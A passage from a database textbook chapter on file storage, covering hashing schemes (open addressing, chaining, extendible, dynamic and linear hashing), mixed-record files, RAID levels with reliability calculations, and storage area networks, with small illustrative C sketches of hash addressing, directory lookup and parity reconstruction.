            while (i ≠ a) and location i is occupied do i ← (i + 1) mod M;
            if (i = a) then all positions are full
            else new_hash_address ← i;
        end;
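
A C sketch that mirrors Algorithm 2 is given below: part (a) folds the character codes of a 20-character key into an address with the mod function, and part (b) resolves a collision by open addressing. The table size M, the occupancy array, and the example key are illustrative assumptions.

    #include <stdio.h>
    #include <string.h>

    #define M        101       /* hash table size (a prime, as suggested below) */
    #define KEY_LEN   20       /* hash field: fixed string of 20 characters     */

    static int occupied[M];    /* 1 if the slot already holds a record          */

    /* Algorithm 2(a): multiply the character codes together, reducing mod M at
     * each step so the running product stays small.                            */
    int hash_address(const char K[KEY_LEN])
    {
        long temp = 1;
        for (int i = 0; i < KEY_LEN; i++)
            temp = (temp * (unsigned char)K[i]) % M;
        return (int)(temp % M);
    }

    /* Algorithm 2(b): open addressing. Starting from the home slot, probe the
     * following slots (wrapping around) until a free one is found; returns -1
     * if the table is completely full.                                         */
    int resolve_by_open_addressing(const char K[KEY_LEN])
    {
        int a = hash_address(K), i = a;
        if (!occupied[i])
            return i;
        i = (i + 1) % M;
        while (i != a && occupied[i])
            i = (i + 1) % M;
        return (i == a) ? -1 : i;
    }

    int main(void)
    {
        char key[KEY_LEN];
        memset(key, ' ', KEY_LEN);
        memcpy(key, "SMITH", 5);              /* name padded with blanks (example) */
        int home = hash_address(key);
        occupied[home] = 1;                   /* pretend a record already sits there */
        printf("home slot %d, next free slot %d\n",
               home, resolve_by_open_addressing(key));
        return 0;
    }
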
Other hashing functions can be used. One technique, called folding, involves applying an arithmetic function such as addition or a logical function such as exclusive or to different portions of the hash field value to calculate the hash address (for example, with an address space from 0 to 999 to store 1,000 keys, a 6-digit key 235469 may be folded and stored at the address: (235 + 964) mod 1000 = 199). Another technique involves picking some digits of the hash field value—for instance, the third, fifth, and eighth digits—to form the hash address (for example, storing 1,000 employees with Social Security numbers of 10 digits into a hash file with 1,000 positions would give the Social Security number 301-67-8923 a hash value of 172 by this hash function).9 The problem with most hashing functions is that they do not guarantee that distinct values will hash to distinct addresses, because the hash field space—the number of possible values a hash field can take—is usually much larger than the address space—the number of available addresses for records. The hashing function maps the hash field space to the address space.

9A detailed discussion of hashing functions is outside the scope of our presentation.

A collision occurs when the hash field value of a record that is being inserted hashes to an address that already contains a different record. In this situation, we must insert the new record in some other position, since its hash address is occupied. The process of finding another position is called collision resolution. There are numerous methods for collision resolution, including the following:

■ Open addressing. Proceeding from the occupied position specified by the hash address, the program checks the subsequent positions in order until an unused (empty) position is found. Algorithm 2(b) may be used for this purpose.

■ Chaining. For this method, various overflow locations are kept, usually by extending the array with a number of overflow positions. Additionally, a pointer field is added to each record location. A collision is resolved by placing the new record in an unused overflow location and setting the pointer of the occupied hash address location to the address of that overflow location. A linked list of overflow records for each hash address is thus maintained, as shown in Figure 8(b).

■ Multiple hashing. The program applies a second hash function if the first results in a collision. If another collision results, the program uses open addressing or applies a third hash function and then uses open addressing if necessary.

Each collision resolution method requires its own algorithms for insertion, retrieval, and deletion of records. The algorithms for chaining are the simplest. Deletion algorithms for open addressing are rather tricky. Data structures textbooks discuss internal hashing algorithms in more detail.

The goal of a good hashing function is to distribute the records uniformly over the address space so as to minimize collisions while not leaving many unused locations. Simulation and analysis studies have shown that it is usually best to keep a hash table between 70 and 90 percent full so that the number of collisions remains low and we do not waste too much space. Hence, if we expect to have r records to store in the table, we should choose M locations for the address space such that (r/M) is between 0.7 and 0.9. It may also be useful to choose a prime number for M, since it has been demonstrated that this distributes the hash addresses better over the address space when the mod hashing function is used. Other hash functions may require M to be a power of 2.

8.2 External Hashing for Disk Files

Hashing for disk files is called external hashing. To suit the characteristics of disk storage, the target address space is made of buckets, each of which holds multiple records. A bucket is either one disk block or a cluster of contiguous disk blocks. The hashing function maps a key into a relative bucket number, rather than assigning an absolute block address to the bucket. A table maintained in the file header converts the bucket number into the corresponding disk block address, as illustrated in Figure 9.

[Figure 9: Matching bucket numbers to disk block addresses: a table with one entry per bucket number (0, 1, 2, …, M − 2, M − 1) giving the address of the corresponding block on disk.]

The collision problem is less severe with buckets, because as many records as will fit in a bucket can hash to the same bucket without causing problems. However, we must make provisions for the case where a bucket is filled to capacity and a new record being inserted hashes to that bucket. We can use a variation of chaining in which a pointer is maintained in each bucket to a linked list of overflow records for the bucket, as shown in Figure 10. The pointers in the linked list should be record pointers, which include both a block address and a relative record position within the block.

Hashing provides the fastest possible access for retrieving an arbitrary record given the value of its hash field. Although most good hash functions do not maintain records in order of hash field values, some functions—called order preserving—do. A simple example of an order preserving hash function is to take the leftmost three digits of an invoice number field that yields a bucket address as the hash address and keep the records sorted by invoice number within each bucket. Another example is to use an integer hash key directly as an index to a relative file, if the hash key values fill up a particular interval; for example, if employee numbers in a company are assigned as 1, 2, 3, ... up to the total number of employees, we can use the identity hash function that maintains order. Unfortunately, this only works if keys are generated in order by some application.
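
As a small illustration of the bucket scheme of Figure 9, the sketch below hashes a key to a relative bucket number and then converts that number into a disk block address through a table kept in the file header; the header layout and the block addresses are invented for the example.

    #include <stdio.h>

    #define M_BUCKETS 4     /* number of buckets allocated for the file (example) */

    /* Hypothetical file header: one disk block address per relative bucket number. */
    struct file_header {
        long bucket_to_block[M_BUCKETS];
    };

    static struct file_header header = {
        { 7000, 7400, 9120, 10240 }     /* made-up block addresses on disk */
    };

    /* Map a hash key to the disk block address of its bucket:
     * key -> relative bucket number -> block address (via the header table). */
    long bucket_block_address(long hash_key)
    {
        int bucket = (int)(hash_key % M_BUCKETS);
        return header.bucket_to_block[bucket];
    }

    int main(void)
    {
        long key = 301678923;   /* e.g., an Ssn used as the hash key */
        printf("key %ld -> bucket %ld -> block %ld\n",
               key, key % M_BUCKETS, bucket_block_address(key));
        return 0;
    }
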
The hashing scheme described so far is called static hashing because a fixed number of buckets M is allocated. This can be a serious drawback for dynamic files. Suppose that we allocate M buckets for the address space and let m be the maximum number of records that can fit in one bucket; then at most (m * M) records will fit in the allocated space. If the number of records turns out to be substantially fewer than (m * M), we are left with a lot of unused space. On the other hand, if the number of records increases to substantially more than (m * M), numerous collisions will result and retrieval will be slowed down because of the long lists of overflow records. In either case, we may have to change the number of blocks M allocated and then use a new hashing function (based on the new value of M) to redistribute the records. These reorganizations can be quite time-consuming for large files. Newer dynamic file organizations based on hashing allow the number of buckets to vary dynamically with only localized reorganization (see Section 8.3).

When using external hashing, searching for a record given a value of some field other than the hash field is as expensive as in the case of an unordered file. Record deletion can be implemented by removing the record from its bucket. If the bucket has an overflow chain, we can move one of the overflow records into the bucket to replace the deleted record. If the record to be deleted is already in overflow, we simply remove it from the linked list. Notice that removing an overflow record implies that we should keep track of empty positions in overflow. This is done easily by maintaining a linked list of unused overflow locations.

[Figure 10: Handling overflow for buckets by chaining. Main buckets (0, 1, 2, …, 9) hold records and a pointer; records that do not fit are placed in overflow buckets and linked by record pointers, which refer to record positions within the overflow blocks (a NULL pointer ends each chain).]

Modifying a specific record’s field value depends on two factors: the search condition to locate that specific record and the field to be modified. If the search condition is an equality comparison on the hash field, we can locate the record efficiently by using the hashing function; otherwise, we must do a linear search. A nonhash field can be modified by changing the record and rewriting it in the same bucket. Modifying the hash field means that the record can move to another bucket, which requires deletion of the old record followed by insertion of the modified record.

8.3 Hashing Techniques That Allow Dynamic File Expansion

A major drawback of the static hashing scheme just discussed is that the hash address space is fixed. Hence, it is difficult to expand or shrink the file dynamically. The schemes described in this section attempt to remedy this situation.
The first scheme—extendible hashing—stores an access structure in addition to the file, and hence is somewhat similar to indexing. The main difference is that the access structure is based on the values that result after application of the hash function to the search field. In indexing, the access structure is based on the values of the search field itself. The second technique, called linear hashing, does not require additional access structures. Another scheme, called dynamic hashing, uses an access structure based on binary tree data structures.

These hashing schemes take advantage of the fact that the result of applying a hashing function is a nonnegative integer and hence can be represented as a binary number. The access structure is built on the binary representation of the hashing function result, which is a string of bits. We call this the hash value of a record. Records are distributed among buckets based on the values of the leading bits in their hash values.

Extendible Hashing. In extendible hashing, a type of directory—an array of 2^d bucket addresses—is maintained, where d is called the global depth of the directory. The integer value corresponding to the first (high-order) d bits of a hash value is used as an index to the array to determine a directory entry, and the address in that entry determines the bucket in which the corresponding records are stored. However, there does not have to be a distinct bucket for each of the 2^d directory locations. Several directory locations with the same first d′ bits for their hash values may contain the same bucket address if all the records that hash to these locations fit in a single bucket. A local depth d′—stored with each bucket—specifies the number of bits on which the bucket contents are based.

Figure 11 shows a directory with global depth d = 3. The value of d can be increased or decreased by one at a time, thus doubling or halving the number of entries in the directory array. Doubling is needed if a bucket, whose local depth d′ is equal to the global depth d, overflows. Halving occurs if d > d′ for all the buckets after some deletions occur. Most record retrievals require two block accesses—one to the directory and the other to the bucket.
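
A minimal sketch of this directory lookup, assuming 32-bit hash values, a global depth of 3, and an illustrative directory in which two pairs of entries share buckets:

    #include <stdio.h>
    #include <stdint.h>

    #define GLOBAL_DEPTH 3                      /* d: the directory has 2^d entries */
    #define DIR_SIZE     (1 << GLOBAL_DEPTH)

    /* Each directory entry points to a bucket; several entries may share a
     * bucket when that bucket's local depth d' is smaller than d.             */
    static int directory[DIR_SIZE] = {
        /* 000 001 010 011 100 101 110 111 */
            0,  1,  2,  2,  3,  3,  4,  5   /* 01x and 10x entries share buckets */
    };

    /* Use the first (high-order) d bits of the 32-bit hash value as the
     * directory index, then follow the entry to the bucket.                   */
    int bucket_for(uint32_t hash_value)
    {
        uint32_t index = hash_value >> (32 - GLOBAL_DEPTH);
        return directory[index];
    }

    int main(void)
    {
        uint32_t h = 0x5A000000u;   /* binary 0101 1010 ...: high 3 bits are 010 */
        printf("hash 0x%08X -> directory entry %u -> bucket %d\n",
               h, h >> (32 - GLOBAL_DEPTH), bucket_for(h));
        return 0;
    }
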

To illustrate bucket splitting, suppose that a new inserted record causes overflow in
the bucket whose hash values start with 01—the third bucket in Figure 11. The
records will be distributed between two buckets: the first contains all records whose
hash values start with 010, and the second all those whose hash values start with
011. Now the two directory locations for 010 and 011 point to the two new distinct
buckets. Before the split, they pointed to the same bucket. The local depth d′ of the
two new buckets is 3, which is one more than the local depth of the old bucket.

If a bucket that overflows and is split used to have a local depth d′ equal to the global
depth d of the directory, then the size of the directory must now be doubled so that
we can use an extra bit to distinguish the two new buckets. For example, if the
bucket for records whose hash values start with 111 in Figure 11 overflows, the two
new buckets need a directory with global depth d = 4, because the two buckets are
now labeled 1110 and 1111, and hence their local depths are both 4. The directory
size is hence doubled, and each of the other original locations in the directory is also split into two locations, both of which have the same pointer value as did the original location.

[Figure 11: Structure of the extendible hashing scheme. A directory with global depth d = 3 has entries 000 through 111 pointing to the data file buckets; the buckets for hash values starting with 000, 001, 110, and 111 have local depth d′ = 3, while the entry pairs 010/011 and 100/101 share buckets of local depth d′ = 2 (for hash values starting with 01 and 10).]

The main advantage of extendible hashing that makes it attractive is that the per-
formance of the file does not degrade as the file grows, as opposed to static external
hashing where collisions increase and the corresponding chaining effectively
increases the average number of accesses per key. Additionally, no space is allocated
in extendible hashing for future growth, but additional buckets can be allocated
dynamically as needed. The space overhead for the directory table is negligible. The
maximum directory size is 2^k, where k is the number of bits in the hash value.
Another advantage is that splitting causes minor reorganization in most cases, since
only the records in one bucket are redistributed to the two new buckets. The only
time reorganization is more expensive is when the directory has to be doubled (or
halved). A disadvantage is that the directory must be searched before accessing the
buckets themselves, resulting in two block accesses instead of one in static hashing.
This performance penalty is considered minor and thus the scheme is considered
quite desirable for dynamic files.

Dynamic Hashing. A precursor to extendible hashing was dynamic hashing, in
which the addresses of the buckets were either the n high-order bits or n − 1 high-
order bits, depending on the total number of keys belonging to the respective
bucket. The eventual storage of records in buckets for dynamic hashing is somewhat
similar to extendible hashing. The major difference is in the organization of the
directory. Whereas extendible hashing uses the notion of global depth (high-order d
bits) for the flat directory and then combines adjacent collapsible buckets into a
bucket of local depth d − 1, dynamic hashing maintains a tree-structured directory
with two types of nodes:

■ Internal nodes that have two pointers—the left pointer corresponding to the
0 bit (in the hashed address) and a right pointer corresponding to the 1 bit.

■ Leaf nodes—these hold a pointer to the actual bucket with records.

An example of dynamic hashing appears in Figure 12. Four buckets are shown
(“000”, “001”, “110”, and “111”) with high-order 3-bit addresses (corresponding to
the global depth of 3), and two buckets (“01” and “10”) are shown with high-order
2-bit addresses (corresponding to the local depth of 2). The latter two are the result
of collapsing the “010” and “011” into “01” and collapsing “100” and “101” into “10”.
Note that the directory nodes are used implicitly to determine the “global” and
“local” depths of buckets in dynamic hashing. The search for a record given the
hashed address involves traversing the directory tree, which leads to the bucket
holding that record. It is left to the reader to develop algorithms for insertion, dele-
tion, and searching of records for the dynamic hashing scheme.

[Figure 12: Structure of the dynamic hashing scheme. A tree-structured directory of internal nodes (each with a 0 branch and a 1 branch) and leaf nodes points to the data file buckets: buckets for hash values starting with 000, 001, 110, and 111, and buckets for hash values starting with 01 and 10.]

Linear Hashing. The idea behind linear hashing is to allow a hash file to expand and shrink its number of buckets dynamically without needing a directory. Suppose that the file starts with M buckets numbered 0, 1, …, M − 1 and uses the mod hash function h(K) = K mod M; this hash function is called the initial hash function h_i. Overflow because of collisions is still needed and can be handled by maintaining individual overflow chains for each bucket. However, when a collision leads to an overflow record in any file bucket, the first bucket in the file—bucket 0—is split into two buckets: the original bucket 0 and a new bucket M at the end of the file. The records originally in bucket 0 are distributed between the two buckets based on a different hashing function h_{i+1}(K) = K mod 2M. A key property of the two hash functions h_i and h_{i+1} is that any records that hashed to bucket 0 based on h_i will hash to either bucket 0 or bucket M based on h_{i+1}; this is necessary for linear hashing to work.
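
The key property can be checked mechanically: every key K with K mod M = 0 satisfies K mod 2M = 0 or K mod 2M = M. A small C spot-check (M is arbitrary here):

    #include <stdio.h>

    /* For linear hashing with initial hash function h_i(K) = K mod M, every key
     * that h_i sends to bucket 0 is sent by h_{i+1}(K) = K mod 2M to either
     * bucket 0 or the new bucket M. This program spot-checks that property.    */
    int main(void)
    {
        const long M = 5;
        for (long K = 0; K <= 100; K++) {
            if (K % M == 0) {                    /* K hashes to bucket 0 under h_i */
                long b = K % (2 * M);            /* bucket under h_{i+1}           */
                if (b != 0 && b != M) {
                    printf("property violated for K=%ld\n", K);
                    return 1;
                }
            }
        }
        printf("every key sent to bucket 0 by h_i goes to bucket 0 or %ld under h_{i+1}\n", M);
        return 0;
    }
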

As further collisions lead to overflow records, additional buckets are split in the
linear order 1, 2, 3, …. If enough overflows occur, all the original file buckets 0, 1, …,
M − 1 will have been split, so the file now has 2M instead of M buckets, and all buck-
ets use the hash function h_{i+1}. Hence, the records in overflow are eventually redis-
tributed into regular buckets, using the function h_{i+1} via a delayed split of their
buckets. There is no directory; only a value n—which is initially set to 0 and is incre-
mented by 1 whenever a split occurs—is needed to determine which buckets have
been split. To retrieve a record with hash key value K, first apply the function h_i to K;
if h_i(K) < n, then apply the function h_{i+1} on K because the bucket is already split. Initially, n = 0, indicating that the function h_i applies to all buckets; n grows linearly as buckets are split.

When n = M after being incremented, this signifies that all the original buckets have been split and the hash function h_{i+1} applies to all records in the file. At this point, n is reset to 0 (zero), and any new collisions that cause overflow lead to the use of a new hashing function h_{i+2}(K) = K mod 4M. In general, a sequence of hashing functions h_{i+j}(K) = K mod (2^j M) is used, where j = 0, 1, 2, ...; a new hashing function h_{i+j+1} is needed whenever all the buckets 0, 1, ..., (2^j M) − 1 have been split and n is reset to 0. The search for a record with hash key value K is given by Algorithm 3.

Algorithm 3. The Search Procedure for Linear Hashing
if n = 0
    then m ← h_j(K) (* m is the hash value of record with hash key K *)
    else begin
        m ← h_j(K);
        if m < n then m ← h_{j+1}(K)
    end;
search the bucket whose hash value is m (and its overflow, if any);

Splitting can be controlled by monitoring the file load factor instead of by splitting whenever an overflow occurs. In general, the file load factor l can be defined as l = r/(bfr * N), where r is the current number of file records, bfr is the maximum number of records that can fit in a bucket, and N is the current number of file buckets. Buckets that have been split can also be recombined if the load factor of the file falls below a certain threshold. Blocks are combined linearly, and N is decremented appropriately. The file load can be used to trigger both splits and combinations; in this manner the file load can be kept within a desired range. Splits can be triggered when the load exceeds a certain threshold—say, 0.9—and combinations can be triggered when the load falls below another threshold—say, 0.7. The main advantages of linear hashing are that it maintains the load factor fairly constantly while the file grows and shrinks, and it does not require a directory.10

10For details of insertion and deletion into linear hashed files, refer to Litwin (1980) and Salzberg (1988).

9 Other Primary File Organizations

9.1 Files of Mixed Records

The file organizations we have studied so far assume that all records of a particular file are of the same record type. The records could be of EMPLOYEEs, PROJECTs, STUDENTs, or DEPARTMENTs, but each file contains records of only one type. In most database applications, we encounter situations in which numerous types of entities are interrelated in various ways. Relationships among records in various files can be represented by connecting fields.11 For example, a STUDENT record can have a connecting field Major_dept whose value gives the name of the DEPARTMENT in which the student is majoring. This Major_dept field refers to a DEPARTMENT entity, which should be represented by a record of its own in the DEPARTMENT file. If we want to retrieve field values from two related records, we must retrieve one of the records first. Then we can use its connecting field value to retrieve the related record in the other file. Hence, relationships are implemented by logical field references among the records in distinct files.

11The concept of foreign keys in the relational data model and references among objects in object-oriented models are examples of connecting fields.
File organizations in object DBMSs, as well as legacy systems such as hierarchical and network DBMSs, often implement relationships among records as physical relationships realized by physical contiguity (or clustering) of related records or by physical pointers. These file organizations typically assign an area of the disk to hold records of more than one type so that records of different types can be physically clustered on disk. If a particular relationship is expected to be used frequently, implementing the relationship physically can increase the system’s efficiency at retrieving related records. For example, if the query to retrieve a DEPARTMENT record and all records for STUDENTs majoring in that department is frequent, it would be desirable to place each DEPARTMENT record and its cluster of STUDENT records contiguously on disk in a mixed file. The concept of physical clustering of object types is used in object DBMSs to store related objects together in a mixed file.

To distinguish the records in a mixed file, each record has—in addition to its field values—a record type field, which specifies the type of record. This is typically the first field in each record and is used by the system software to determine the type of record it is about to process. Using the catalog information, the DBMS can determine the fields of that record type and their sizes, in order to interpret the data values in the record.

9.2 B-Trees and Other Data Structures as Primary Organization

Other data structures can be used for primary file organizations. For example, if both the record size and the number of records in a file are small, some DBMSs offer the option of a B-tree data structure as the primary file organization. In general, any data structure that can be adapted to the characteristics of disk devices can be used as a primary file organization for record placement on disk. Recently, column-based storage of data has been proposed as a primary method for storage of relations in relational databases.

10 Parallelizing Disk Access Using RAID Technology

With the exponential growth in the performance and capacity of semiconductor devices and memories, faster microprocessors with larger and larger primary memories are continually becoming available. To match this growth, it is natural to expect that secondary storage technology must also take steps to keep up with processor technology in performance and reliability.

[Figure 13: Striping of data across multiple disks. (a) Bit-level striping across four disks: the bits of each block of files A and B are spread over Disks 0 through 3 (Disk 0 holds A0 | A4 and B0 | B4, Disk 1 holds A1 | A5 and B1 | B5, and so on). (b) Block-level striping across four disks: blocks A1, A2, A3, and A4 of file A are placed on Disks 0 through 3, one block per disk.]

A major advance in secondary storage technology is represented by the development of RAID, which originally stood for Redundant Arrays of Inexpensive Disks. More recently, the I in RAID is said to stand for Independent. The RAID idea received a very positive industry endorsement and has been developed into an elaborate set of alternative RAID architectures (RAID levels 0 through 6). We highlight the main features of the technology in this section.
The main goal of RAID is to even out the widely different rates of performance improvement of disks against those in memory and microprocessors.12 While RAM capacities have quadrupled every two to three years, disk access times are improving at less than 10 percent per year, and disk transfer rates are improving at roughly 20 percent per year. Disk capacities are indeed improving at more than 50 percent per year, but the speed and access time improvements are of a much smaller magnitude. A second qualitative disparity exists between the ability of special microprocessors that cater to new applications involving video, audio, image, and spatial data processing and the corresponding lack of fast access to large, shared data sets.

12This was predicted by Gordon Bell to be about 40 percent every year between 1974 and 1984 and is now supposed to exceed 50 percent per year.

The natural solution is a large array of small independent disks acting as a single higher-performance logical disk. A concept called data striping is used, which utilizes parallelism to improve disk performance. Data striping distributes data transparently over multiple disks to make them appear as a single large, fast disk. Figure 13 shows a file distributed or striped over four disks. Striping improves overall I/O performance by allowing multiple I/Os to be serviced in parallel, thus providing high overall transfer rates. Data striping also accomplishes load balancing among disks. Moreover, by storing redundant information on disks using parity or some other error-correction code, reliability can be improved. In Sections 10.1 and 10.2, we discuss how RAID achieves the two important objectives of improved reliability and higher performance. Section 10.3 discusses RAID organizations and levels.

10.1 Improving Reliability with RAID

For an array of n disks, the likelihood of failure is n times as much as that for one disk. Hence, if the MTBF (Mean Time Between Failures) of a disk drive is assumed to be 200,000 hours or about 22.8 years (for the disk drive in Table 1 called Cheetah NS, it is 1.4 million hours), the MTBF for a bank of 100 disk drives becomes only 2,000 hours or 83.3 days (for 1,000 Cheetah NS disks it would be 1,400 hours or 58.33 days). Keeping a single copy of data in such an array of disks will cause a significant loss of reliability.

An obvious solution is to employ redundancy of data so that disk failures can be tolerated. The disadvantages are many: additional I/O operations for write, extra computation to maintain redundancy and to do recovery from errors, and additional disk capacity to store redundant information.

One technique for introducing redundancy is called mirroring or shadowing. Data is written redundantly to two identical physical disks that are treated as one logical disk. When data is read, it can be retrieved from the disk with shorter queuing, seek, and rotational delays. If a disk fails, the other disk is used until the first is repaired. Suppose the mean time to repair is 24 hours, then the mean time to data loss of a mirrored disk system using 100 disks with MTBF of 200,000 hours each is (200,000)^2/(2 × 24) = 8.33 × 10^8 hours, which is 95,028 years.13 Disk mirroring also doubles the rate at which read requests are handled, since a read can go to either disk. The transfer rate of each read, however, remains the same as that for a single disk.

13The formulas for MTBF calculations appear in Chen et al. (1994).
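
The quoted figure can be reproduced with a few lines of C; the formula below simply restates the calculation in the text (see footnote 13 for its source) and is not a general reliability model:

    #include <stdio.h>

    int main(void)
    {
        double mtbf = 200000.0;          /* MTBF of one disk, in hours          */
        double mttr = 24.0;              /* mean time to repair, in hours       */

        /* Mean time to data loss as quoted in the text: MTBF^2 / (2 * MTTR).   */
        double mttdl_hours = (mtbf * mtbf) / (2.0 * mttr);
        double mttdl_years = mttdl_hours / (24.0 * 365.25);

        printf("mean time to data loss: %.3g hours (about %.0f years)\n",
               mttdl_hours, mttdl_years);   /* ~8.33e+08 hours, roughly 95,000 years */
        return 0;
    }
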
Another solution to the problem of reliability is to store extra information that is not normally needed but that can be used to reconstruct the lost information in case of disk failure. The incorporation of redundancy must consider two problems: selecting a technique for computing the redundant information, and selecting a method of distributing the redundant information across the disk array. The first problem is addressed by using error-correcting codes involving parity bits, or specialized codes such as Hamming codes. Under the parity scheme, a redundant disk may be considered as having the sum of all the data in the other disks. When a disk fails, the missing information can be constructed by a process similar to subtraction. For the second problem, the two major approaches are either to store the redundant information on a small number of disks or to distribute it uniformly across all disks. The latter results in better load balancing. The different levels of RAID choose a combination of these options to implement redundancy and improve reliability.

10.2 Improving Performance with RAID

The disk arrays employ the technique of data striping to achieve higher transfer rates. Note that data can be read or written only one block at a time, so a typical transfer contains 512 to 8192 bytes. Disk striping may be applied at a finer granularity by breaking up a byte of data into bits and spreading the bits to different disks. Thus, bit-level data striping consists of splitting a byte of data and writing bit j to the jth disk. With 8-bit bytes, eight physical disks may be considered as one logical disk with an eightfold increase in the data transfer rate. Each disk participates in each I/O request and the total amount of data read per request is eight times as much. Bit-level striping can be generalized to a number of disks that is either a multiple or a factor of eight. Thus, in a four-disk array, bit n goes to the disk which is (n mod 4). Figure 13(a) shows bit-level striping of data.

The granularity of data interleaving can be higher than a bit; for example, blocks of a file can be striped across disks, giving rise to block-level striping. Figure 13(b) shows block-level data striping assuming the data file contains four blocks. With block-level striping, multiple independent requests that access single blocks (small requests) can be serviced in parallel by separate disks, thus decreasing the queuing time of I/O requests. Requests that access multiple blocks (large requests) can be parallelized, thus reducing their response time. In general, the larger the number of disks in an array, the larger the potential performance benefit. However, assuming independent failures, the disk array of 100 disks collectively has 1/100th the reliability of a single disk. Thus, redundancy via error-correcting codes and disk mirroring is necessary to provide reliability along with high performance.
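
A minimal sketch of the block-level striping layout of Figure 13(b): with n disks, file block k can be placed on disk k mod n at stripe position k div n; bit-level striping applies the same arithmetic to bit positions. The four-disk array and the mapping function are illustrative.

    #include <stdio.h>

    #define NUM_DISKS 4    /* disks in the array, as in Figure 13 */

    /* Block-level striping: file block k goes to disk (k mod n) and occupies
     * position (k div n) within that disk's portion of the stripe.            */
    void place_block(int k, int *disk, int *offset)
    {
        *disk   = k % NUM_DISKS;
        *offset = k / NUM_DISKS;
    }

    int main(void)
    {
        for (int k = 0; k < 8; k++) {
            int d, off;
            place_block(k, &d, &off);
            printf("file block %d -> disk %d, stripe position %d\n", k, d, off);
        }
        return 0;
    }
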
10.3 RAID Organizations and Levels

Different RAID organizations were defined based on different combinations of the two factors of granularity of data interleaving (striping) and pattern used to compute redundant information. In the initial proposal, levels 1 through 5 of RAID were proposed, and two additional levels—0 and 6—were added later.

RAID level 0 uses data striping, has no redundant data, and hence has the best write performance since updates do not have to be duplicated. It splits data evenly across two or more disks. However, its read performance is not as good as RAID level 1, which uses mirrored disks. In the latter, performance improvement is possible by scheduling a read request to the disk with shortest expected seek and rotational delay. RAID level 2 uses memory-style redundancy by using Hamming codes, which contain parity bits for distinct overlapping subsets of components. Thus, in one particular version of this level, three redundant disks suffice for four original disks, whereas with mirroring—as in level 1—four would be required. Level 2 includes both error detection and correction, although detection is generally not required because broken disks identify themselves.

RAID level 3 uses a single parity disk, relying on the disk controller to figure out which disk has failed. Levels 4 and 5 use block-level data striping, with level 5 distributing data and parity information across all disks. Figure 14(b) shows an illustration of RAID level 5, where parity is shown with subscript p. If one disk fails, the missing data is calculated based on the parity available from the remaining disks. Finally, RAID level 6 applies the so-called P + Q redundancy scheme using Reed-Solomon codes to protect against up to two disk failures by using just two redundant disks.

[Figure 14: Some popular levels of RAID. (a) RAID level 1: Mirroring of data on two disks. (b) RAID level 5: Striping of data for files A, B, C, and D with distributed parity across four disks; each disk holds three data blocks and one parity block (A1 B1 C1 Dp | A2 B2 Cp D1 | A3 Bp C2 D2 | Ap B3 C3 D3).]

Rebuilding in case of disk failure is easiest for RAID level 1. Other levels require the reconstruction of a failed disk by reading multiple disks. Level 1 is used for critical applications such as storing logs of transactions. Levels 3 and 5 are preferred for large volume storage, with level 3 providing higher transfer rates. The most popular uses of RAID technology currently are level 0 (with striping), level 1 (with mirroring), and level 5 with an extra drive for parity. A combination of multiple RAID levels is also used; for example, 0+1 combines striping and mirroring using a minimum of four disks. Other nonstandard RAID levels include RAID 1.5, RAID 7, RAID-DP, RAID S or Parity RAID, Matrix RAID, RAID-K, RAID-Z, RAIDn, Linux MD RAID 10, IBM ServeRAID 1E, and unRAID. A discussion of these nonstandard levels is beyond the scope of this text.

Designers of a RAID setup for a given application mix have to confront many design decisions, such as the level of RAID, the number of disks, the choice of parity schemes, and grouping of disks for block-level striping. Detailed performance studies on small reads and writes (referring to I/O requests for one striping unit) and large reads and writes (referring to I/O requests for one stripe unit from each disk in an error-correction group) have been performed.
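
As an illustration of the parity idea used in levels 3 through 5, the sketch below takes bitwise XOR as the parity function, which is one common concrete realization of the "sum of all the data" and "process similar to subtraction" described in Section 10.1; the group size and block contents are made up for the example.

    #include <stdio.h>
    #include <stdint.h>
    #include <string.h>

    #define NDATA      3      /* data blocks per parity group (illustrative) */
    #define BLOCK_SIZE 8      /* tiny blocks, just for the demonstration     */

    /* Parity block = XOR of the data blocks in the group. */
    void compute_parity(uint8_t data[NDATA][BLOCK_SIZE], uint8_t parity[BLOCK_SIZE])
    {
        memset(parity, 0, BLOCK_SIZE);
        for (int d = 0; d < NDATA; d++)
            for (int i = 0; i < BLOCK_SIZE; i++)
                parity[i] ^= data[d][i];
    }

    /* Reconstruct a lost data block by XORing the surviving blocks with parity. */
    void reconstruct(uint8_t data[NDATA][BLOCK_SIZE], const uint8_t parity[BLOCK_SIZE],
                     int lost)
    {
        memcpy(data[lost], parity, BLOCK_SIZE);
        for (int d = 0; d < NDATA; d++)
            if (d != lost)
                for (int i = 0; i < BLOCK_SIZE; i++)
                    data[lost][i] ^= data[d][i];
    }

    int main(void)
    {
        uint8_t data[NDATA][BLOCK_SIZE] = { "blk-A1", "blk-B1", "blk-C1" };
        uint8_t parity[BLOCK_SIZE];

        compute_parity(data, parity);
        memset(data[1], 0, BLOCK_SIZE);          /* simulate losing block B1      */
        reconstruct(data, parity, 1);
        printf("recovered block: %s\n", (char *)data[1]);   /* prints blk-B1      */
        return 0;
    }
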
11 New Storage Systems

In this section, we describe three recent developments in storage systems that are becoming an integral part of most enterprises’ information system architectures.

11.1 Storage Area Networks

With the rapid growth of electronic commerce, Enterprise Resource Planning (ERP) systems that integrate application data across organizations, and data warehouses that keep historical aggregate information, the demand for storage has gone up substantially. For today’s Internet-driven organizations, it has become necessary to move from a static, fixed, data-center-oriented operation to a more flexible and dynamic infrastructure for their information processing requirements. The total cost of managing all data is growing so rapidly that in many instances the cost of managing server-attached storage exceeds the cost of the server itself. Furthermore, the procurement cost of storage is only a small fraction—typically, only 10 to 15 percent of the overall cost of storage management. Many users of RAID systems cannot use the capacity effectively because it has to be attached in a fixed manner to one or more servers. Therefore, most large organizations have moved to a concept called storage area networks (SANs). In a SAN, online storage peripherals are configured as nodes on a high-speed network and can be attached and detached from servers in a very flexible manner. Several companies have emerged as SAN providers and supply their own proprietary topologies. They allow storage systems to be placed at longer distances from the servers and provide different performance and connectivity options. Existing storage management applications can be ported into SAN configurations using Fiber Channel networks that encapsulate the legacy SCSI protocol. As a result, the SAN-attached devices appear as SCSI devices.

Current architectural alternatives for SAN include the following: point-to-point connections between servers and storage systems via fiber channel; use of a fiber channel switch to connect multiple RAID systems, tape libraries, and so on to servers; and the use of fiber channel hubs and switches to connect servers and storage systems in different configurations. Organizations can slowly move up from simpler topologies to more complex ones by adding servers and storage devices as needed. We do not provide further details here because they vary among SAN vendors. The main advantages claimed include:

■ Flexible many-to-many connectivity among servers and storage devices using fiber channel hubs and switches

■ Up to 10 km separation between a server and a storage system using appropriate fiber optic cables

■ Better isolation capabilities allowing nondisruptive addition of new peripherals and servers

